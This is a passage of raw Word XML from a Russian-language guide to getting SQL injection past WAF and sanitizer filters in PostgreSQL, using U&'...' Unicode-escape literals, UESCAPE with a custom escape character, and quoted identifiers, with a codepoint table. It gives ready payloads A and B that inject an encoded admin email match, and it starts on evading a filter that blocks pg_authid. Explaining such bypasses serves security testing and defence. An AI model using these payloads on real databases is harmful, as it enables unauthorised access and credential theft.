      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Не трогает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>строковый литерал на уровне лексера</w:t>
      </w:r>
      <w:r>
        <w:t>, не функция.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F52B089" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF с эвристикой «слишком много `chr()`»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> записывается одной строкой, без повторных function-call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B6FE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom escape через `UESCAPE`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если фильтр режет backslash (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), Unicode-escape допускает любой однобайтовый escape-символ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'!0070!0067' UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — backslash в payload не появляется вовсе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FF690" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Принципиальное ограничение то же, что у 3.9.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>строковое значение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не SQL-токен. Для имён функций/таблиц — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в DO-блоке. Но есть бонус: PG также поддерживает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"identifier"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>идентификаторов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (имена таблиц, колонок), что в некоторых сценариях позволяет проходить keyword-фильтры на лексическом уровне.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672B467" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — U&amp;'...' для содержимого литерала</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697FA5D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст — фильтр блокирует подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload-е (sanitizer запретил конкретные email-домены/usernames):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6109FB73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57005C84"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U&amp;'\0061\0064\006D\0069\006E\0040\0063\006F\002E\0063\006F\006D' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA29D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0953060E"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511BF35E"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38544467" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0E270" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = U&amp;'\0061\0064\006D\0069\006E\0040\0063\006F\002E\0063\006F\006D' --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8B8CF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG-парсер на лексическом уровне видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, интерпретирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как Unicode codepoint и собирает строку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Дальше парсер выражений видит обычный текстовый литерал — WAF/sanitizer на стороне приложения подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не находил, потому что её в payload-тексте нет (только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\0040</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB0AD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Codepoint encoding-таблица для часто нужных символов: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9479F" w14:paraId="33507F5A"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7CB954D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Символ</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82B717C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>`\NNNN`</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5AD5299" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Символ</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546AC64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>`\NNNN`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="356AE223"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325F76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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84FB72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0061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AF2C7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_</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4A9CB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\005F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4AC60F2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22165" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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7800E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0041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C65B68"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AD69F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0028</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="34E16B25"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3F30E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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4374BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0030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E275A9"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8D006" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0029</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="585B090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D832BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (space)</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1FAE16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0020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6686FE"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5581A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\002C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0F8644E5"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754D72"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28DF57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0027</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0CC6AC"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2EABEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\003B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="57934F8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0DB5AC"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FF4EF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\0022</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53E82"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BBE6D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\002F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0E5D314F"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5F835A"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3EF733" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\003D</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9E41C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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4D8E69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>\005C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28394B0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для кодов вне BMP (U+10000 и выше) — синтаксис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\+NNNNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (плюс плюс шесть hex-цифр). Для ASCII всегда хватает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNNN</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39007FF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — U&amp;'...' UESCAPE '!' (обход фильтра на backslash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A35EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Применимо, когда sanitizer удаляет/блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UESCAPE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> назначает альтернативный escape-символ — любой однобайтовый, кроме hex-цифр,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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3356A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Контекст — sanitizer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value = value.replace("\\", "")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Стандартный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'\0027'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после sanitize превращается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'0027'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не Unicode-escape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а обычная строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'0027'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атака сорвана. Замена escape-символа:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F4BAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13565ED3"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U&amp;'!0061!0064!006D!0069!006E!0040!0063!006F!002E!0063!006F!006D' UESCAPE '!' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380829D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241FC98E"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728424A0"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527DF85F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AE443B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = U&amp;'!0061!0064!006D!0069!006E!0040!0063!006F!002E!0063!006F!006D' UESCAPE '!' --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C5E9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как escape вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>. Sanitizer-у нечего удалять — backslash в payload отсутствует.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43462B9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — U&amp;"identifier" для имён таблиц/колонок (обход idspecific keyword-фильтра)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603EE90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Применимо, когда фильтр блокирует имя таблицы/колонки как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>слово в идентификаторе</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bpg_authid\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quoted-identifier-форма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
